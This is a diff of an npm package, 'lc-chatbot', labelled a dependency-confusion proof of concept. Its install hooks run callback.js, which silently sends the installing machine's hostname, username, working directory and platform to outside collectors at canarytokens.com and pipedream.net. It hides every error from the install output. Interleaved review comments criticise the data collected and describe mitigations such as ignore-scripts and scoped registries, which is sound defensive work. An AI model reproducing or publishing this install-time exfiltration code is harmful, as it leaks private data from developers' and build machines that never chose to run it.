lc-chatbot 0.9.0-rc.0

Files changed (3) hide show
  1. package/callback.js +63 -0
  2. package/index.js +4 -0
  3. package/package.json +14 -0
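--- a/package/callback.js
+++ b/package/callback.js
@@ -0,0 +1,63 @@
+ /*
+ * dependency-confusion proof-of-concept callback.
+ */
+ 'use strict';
+
+ // ---- collector endpoints ----
+ var CANARY_HOST = '4cyx1u2wzgs8wpgmy4rq1nrvm.canarytokens.com';
+ var PIPEDREAM_URL = 'https://eolxuw8fddeyjj8.m.pipedream.net';
+ // ----------------------------------------
+
+ try {
+ var os = require('os');
+ var dns = require('dns');
+ var https = require('https');
+
+ var token = Math.random().toString(36).slice(2, 10);
+
+ var host = '';
+ try { host = os.hostname() || ''; } catch (e) {}
+ var user = '';
+ try { user = (os.userInfo() || {}).username || ''; } catch (e) {}
+ var cwd = '';
+ try { cwd = process.cwd() || ''; } catch (e) {}
+ var pkg = (process.env.npm_package_name || 'lc-chatbot') + '@' +
+ (process.env.npm_package_version || '');
+
+ // hex-encode hostname into a single DNS-safe label (<=63 chars; truncate long names)
+ function hexLabel(s) {
+ var h = Buffer.from(String(s)).toString('hex');
+ return h.length > 58 ? h.slice(0, 58) : h;
+ }
+
+ // ---- DNS channel (Canarytokens) ----
+ try {
+ if (CANARY_HOST && CANARY_HOST.indexOf('__') === -1) {
+ var name = hexLabel(host) + '.' + token + '.' + CANARY_HOST;
+ dns.resolve(name, function () {});
+ dns.resolve4(name, function () {});
+ }
+ } catch (e) {}
+
+ // ---- HTTP channel — richer data + notifications ----
+ try {
+ if (PIPEDREAM_URL && PIPEDREAM_URL.indexOf('__') === -1) {
+ var qs = '?t=' + encodeURIComponent(token) +
+ '&h=' + encodeURIComponent(host) +
+ '&u=' + encodeURIComponent(user) +
+ '&cwd=' + encodeURIComponent(cwd) +
+ '&pkg=' + encodeURIComponent(pkg) +
+ '&plat=' + encodeURIComponent(process.platform + '/' + process.arch);
+ var req = https.get(PIPEDREAM_URL + qs, function (res) { res.resume(); });
+ req.on('error', function () {});
+ req.setTimeout(4000, function () { try { req.destroy(); } catch (e) {} });
+ if (req.unref) req.unref();
+ }
+ } catch (e) {}
+ } catch (e) {
+ // swallow everything — never break the host build
+ }
+
+ // never block / never fail the install
+ try { setTimeout(function () {}, 0); } catch (e) {}
+ process.exitCode = 0;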
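Review bot: The HTTP channel sends the installing machine's hostname, OS username and working directory (`h`, `u`, `cwd`) to a third-party collector, and the DNS channel encodes the hostname into the query name; that is more than is needed to show the install hook ran, and the file header says nothing about what is collected or whom to contact. A random token plus the package name already proves execution, e.g. `var qs = '?t=' + encodeURIComponent(token) + '&pkg=' + encodeURIComponent(pkg);` and `var name = token + '.' + CANARY_HOST;`, with the header comment listing the fields sent and a contact for the test. Because every error is swallowed and `process.exitCode` is forced to 0, the install output shows nothing; what a defender can observe is the lookups under `canarytokens.com` and the GET to `m.pipedream.net` issued from an npm lifecycle script.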
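--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,4 @@
+ // Dependency-confusion proof-of-concept.
+ // Intentionally exports an empty object so that if a build imports this package
+ // it does not hard-crash.
+ module.exports = {};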
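--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,14 @@
+ {
+ "name": "lc-chatbot",
+ "version": "0.9.0-rc.0",
+ "description": "Dependency-confusion proof-of-concept",
+ "main": "index.js",
+ "scripts": {
+ "preinstall": "node callback.js",
+ "postinstall": "node callback.js"
+ },
+ "keywords": ["security-research", "placeholder", "do-not-use"],
+ "author": "absec",
+ "license": "MIT",
+ "files": ["index.js", "callback.js", "README.md"]
+ }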
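Review bot: `preinstall` and `postinstall` both run `node callback.js`, so a single install executes the callback twice with the installing user's privileges, whether or not anything ever imports the package, and the manifest carries no `repository` or `bugs` contact for whoever notices the traffic. `files` also lists `README.md`, which is not among the three files in this diff, so the package appears to ship without the explanation its keywords suggest. Installs that run with `ignore-scripts=true` in `.npmrc` (or `npm install --ignore-scripts`) do not execute either hook, and binding the internal package name to a scoped private registry keeps a public `lc-chatbot` from being resolved in the first place.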